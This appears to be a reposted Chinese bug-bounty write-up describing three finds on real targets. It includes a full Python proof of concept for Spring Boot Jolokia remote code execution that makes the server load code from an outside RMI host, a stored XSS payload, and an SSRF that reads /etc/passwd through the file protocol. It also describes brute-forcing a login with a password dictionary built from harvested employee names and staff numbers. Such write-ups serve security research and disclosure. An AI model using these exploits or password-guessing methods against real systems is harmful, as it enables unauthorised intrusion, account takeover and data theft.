无语死啦,都是一些正常操作,没有思路,无脑挖就好了
发现特征是spring的站,然后就扫了一下目录/actuator/jolokia,有这个目录,然后搜索一下里面的关键词
应该是可以rce的
用一下不知道从哪找到的poc
import requestsurl = 'http://url/actuator/jolokia'create_realm = {"mbean": "Tomcat:type=MBeanFactory","type": "EXEC","operation": "createJNDIRealm","arguments": ["Tomcat:type=Engine"]}wirte_factory = {"mbean": "Tomcat:realmPath=/realm0,type=Realm","type": "WRITE","attribute": "contextFactory","value": "com.sun.jndi.rmi.registry.RegistryContextFactory"}write_url = {"mbean": "Tomcat:realmPath=/realm0,type=Realm","type": "WRITE","attribute": "connectionURL","value": "rmi://oudeknxjnd.dnstunnel.run:1389/Evil"}stop = {"mbean": "Tomcat:realmPath=/realm0,type=Realm","type": "EXEC","operation": "stop","arguments": []}start = {"mbean": "Tomcat:realmPath=/realm0,type=Realm","type": "EXEC","operation": "start","arguments": []}flow = [create_realm, wirte_factory, write_url, stop, start]for i in flow:print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute'))))r = requests.post(url, json=i)r.json()print(r.status_code)
然后打他
dnslog收到响应
给的钱不多。
发现某个未授权的站,然后经过测试有存储xss还有一个ssrf
直接插进去就好
"><script>alert(1)</script>然后在找的时候发现一处
https://url/data/fileDownload?link=第一反应是ssrf
发现dnslog是可以请求的,而且这个是请求之后,会把获取到的东西全部下载下来。
看来是支持http协议的
https://url/data/fileDownload?link=http://www.baidu.com下载了html源码,全回显。
又测试了一下file协议
https://url/data/fileDownload?link=file:///etc/passwd界面是ant design写的,试试找未授权的接口或者尝试账号密码爆破。
通过urlfind是找到了几个未授权接口的,但是都没啥用,需要构造参数,构造半天没构造出来,就先放一边。
然后想着爆破密码,之前挖这家,收集了一些人的名字信息,以及邮箱信息,加上爆破弱口令失败,本来都想放弃了,但是刚好在逛github发现了这个
https://github.com/zgjx6/SocialEngineeringDictionaryGenerator也就在正经攻防中会用到,平常挖src,到密码这我都是放弃的,索性就试一下。然后根据已知的信息,生成了一堆密码
类似这种,不过我加了一些特殊符号。
然后用yakit的fuzz功能,跑出密码@姓名+工号@
成功登录
其实也算是捡漏了。这家src统一密码管理,之前有个漏洞信息泄露,获取到一些密码都是a-zA-Z0-9混合,然后10位数。
往期文章推荐
文章来源: http://mp.weixin.qq.com/s?__biz=MzkxOTM1MTU0OQ==&mid=2247484971&idx=1&sn=a12835a074042007adcfab7dc458f035&chksm=c1a23fb9f6d5b6afb1b8d7940a8ec3be7e8069fc9ac073b5e8b02252c1d9db7cdf540d2789dc#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh